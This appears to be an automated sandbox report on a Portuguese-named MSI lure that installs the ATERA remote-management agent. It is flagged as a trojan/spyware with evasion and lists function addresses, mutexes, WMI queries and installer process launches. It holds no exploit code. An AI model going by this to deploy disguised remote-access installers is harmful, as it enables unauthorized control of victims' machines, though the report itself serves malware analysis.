                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F522B037_2_00007FFB02F522B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F5A2F037_2_00007FFB02F5A2F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F7831037_2_00007FFB02F78310
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F6C22037_2_00007FFB02F6C220
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F2224037_2_00007FFB02F22240
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F540A037_2_00007FFB02F540A0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F4A0C037_2_00007FFB02F4A0C0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F3C11037_2_00007FFB02F3C110
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F4A7E037_2_00007FFB02F4A7E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC273837_2_00007FFB02EC2738
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02ECE72037_2_00007FFB02ECE720
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F7686037_2_00007FFB02F76860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC886037_2_00007FFB02EC8860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBE80C37_2_00007FFB02EBE80C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FEE5B037_2_00007FFB02FEE5B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F6A5D037_2_00007FFB02F6A5D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FD05D037_2_00007FFB02FD05D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F3060037_2_00007FFB02F30600
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBA52437_2_00007FFB02EBA524
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F0051037_2_00007FFB02F00510
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC44DC37_2_00007FFB02EC44DC
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FEC68037_2_00007FFB02FEC680
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F164A037_2_00007FFB02F164A0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F3455037_2_00007FFB02F34550
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB85D437_2_00007FFB02EB85D4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F6E59037_2_00007FFB02F6E590
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F9659037_2_00007FFB02F96590
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F5CC0037_2_00007FFB02F5CC00
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FE4C8037_2_00007FFB02FE4C80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F9AB0037_2_00007FFB02F9AB00
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F2CB5037_2_00007FFB02F2CB50
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F08B9037_2_00007FFB02F08B90
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F7AA7037_2_00007FFB02F7AA70
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB28C037_2_00007FFB02EB28C0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F088A037_2_00007FFB02F088A0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02ED6A8037_2_00007FFB02ED6A80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EF8A6037_2_00007FFB02EF8A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB8A3C37_2_00007FFB02EB8A3C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FA691037_2_00007FFB02FA6910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F0E99037_2_00007FFB02F0E990
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC2F8C37_2_00007FFB02EC2F8C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F4EFD037_2_00007FFB02F4EFD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBCEA837_2_00007FFB02EBCEA8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EF902037_2_00007FFB02EF9020
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EFAFB037_2_00007FFB02EFAFB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F10E3037_2_00007FFB02F10E30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EFACD037_2_00007FFB02EFACD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC6CC037_2_00007FFB02EC6CC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EDCE7037_2_00007FFB02EDCE70
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F24D0037_2_00007FFB02F24D00
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F78D2037_2_00007FFB02F78D20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F36D2037_2_00007FFB02F36D20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB03000D3037_2_00007FFB03000D30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FECD6037_2_00007FFB02FECD60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB4DB437_2_00007FFB02EB4DB4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F8F3E037_2_00007FFB02F8F3E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBF34037_2_00007FFB02EBF340
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB347437_2_00007FFB02EB3474
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F4D35037_2_00007FFB02F4D350
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02ED93D037_2_00007FFB02ED93D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F4B37037_2_00007FFB02F4B370
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F1F1B037_2_00007FFB02F1F1B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FC320037_2_00007FFB02FC3200
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F2F22037_2_00007FFB02F2F220
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBD28437_2_00007FFB02EBD284
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FE50F037_2_00007FFB02FE50F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F4917037_2_00007FFB02F49170
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB11B037_2_00007FFB02EB11B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EFD77037_2_00007FFB02EFD770
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB0300184037_2_00007FFB03001840
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FA56D037_2_00007FFB02FA56D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F236E037_2_00007FFB02F236E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02ECD83037_2_00007FFB02ECD830
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F5772037_2_00007FFB02F57720
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F0F78037_2_00007FFB02F0F780
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FFF79037_2_00007FFB02FFF790
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB955C37_2_00007FFB02EB955C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F1B64737_2_00007FFB02F1B647
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB74B037_2_00007FFB02EB74B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F5169037_2_00007FFB02F51690
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC564037_2_00007FFB02EC5640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBD63437_2_00007FFB02EBD634
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EFF63037_2_00007FFB02EFF630
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FF3C2037_2_00007FFB02FF3C20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EE5AD037_2_00007FFB02EE5AD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F53AF037_2_00007FFB02F53AF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F17B3037_2_00007FFB02F17B30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EDBBE037_2_00007FFB02EDBBE0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F9DB8037_2_00007FFB02F9DB80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EF9BA037_2_00007FFB02EF9BA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F1B9F037_2_00007FFB02F1B9F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EDD91037_2_00007FFB02EDD910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F67A6037_2_00007FFB02F67A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EE9A6037_2_00007FFB02EE9A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F118DA37_2_00007FFB02F118DA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EE9F3037_2_00007FFB02EE9F30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC7F3037_2_00007FFB02EC7F30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB7EC037_2_00007FFB02EB7EC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F65EA037_2_00007FFB02F65EA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFB030006B0 appears 145 times
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFB03001D30 appears 114 times
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFB03001B70 appears 102 times
                                Source: System.ComponentModel.Primitives.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Private.Xml.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Runtime.Numerics.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Runtime.InteropServices.RuntimeInformation.dll.2.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-memory-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Net.Ping.dll.2.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Diagnostics.FileVersionInfo.dll.2.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l2-1-0.dll.2.drStatic PE information: No import functions for PE file found
                                Source: mscorrc.dll.2.drStatic PE information: No import functions for PE file found
                                Source: Microsoft.CSharp.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Net.Primitives.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Security.Cryptography.Encoding.dll.2.drStatic PE information: No import functions for PE file found
                                Source: TRABALHO----PROCESSO0014S55-S440000000S1.msiBinary or memory string: OriginalFilenameAlphaControlAgentInstallation.dll\ vs TRABALHO----PROCESSO0014S55-S440000000S1.msi
                                Source: TRABALHO----PROCESSO0014S55-S440000000S1.msiBinary or memory string: OriginalFilenameSfxCA.dll\ vs TRABALHO----PROCESSO0014S55-S440000000S1.msi
                                Source: TRABALHO----PROCESSO0014S55-S440000000S1.msiBinary or memory string: OriginalFilenamewixca.dll\ vs TRABALHO----PROCESSO0014S55-S440000000S1.msi
                                Source: classification engineClassification label: mal100.troj.spyw.evad.winMSI@109/899@0/10
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2196:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5484:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2168:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6196:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8020:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7936:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5376:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\GenericDevicesFileLock
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\C__Program Files (x86)_ATERA Networks_AteraAgent_Packages_AgentPackageProgramManagement_logs_chocolatey.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\Global\Access_ISABUS.HTP.Method
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4308:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6992:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8132:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8056:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2340:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1624:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5436:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2120:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\SNMPDevicesFileLock
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\NLogMutexTester
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\Global\NLog-FileFileArchiveLock-c:_program files (x86)_atera networks_ateraagent_packages_agentpackagemonitoring_log.txt
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3900:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\Global\{bd59231e-97d1-4fc0-a975-80c3fed498b7}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\C__Program Files (x86)_ATERA Networks_AteraAgent_Packages_AgentPackageProgramManagement_logs_choco.summary.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\Global\Access_PCI
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\HttpDevicesFileLock
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7916:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\ServerDevicesFileLock
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFE6A2605396FBB224.TMP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AteraAgent.exe")
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile read: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                                Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI9B15.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5020687 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: SELECT Identifier, Severity, Timestamp FROM ThresholdDuration WHERE Identifier = @id;kDELETE FROM ThresholdDuration WHERE Identifier = @id;
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: INSERT INTO [AlertsSent] (Timestamp, Alerts) VALUES (@timestamp, @alerts);kExecuteScriptAsync SystemTools Start scriptGuid : {0}Wrunscriptguid {0} 10 W10= disableSendResultC{0} {1} {2} {3} or8ixLi90Mf "{4}"
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: INSERT INTO ThresholdDuration (Identifier,Severity,Timestamp) Values (@identifier, @severity, @timestamp) ON CONFLICT (Identifier) DO UPDATE SET Severity = excluded.Severity, Timestamp = excluded.Timestamp;
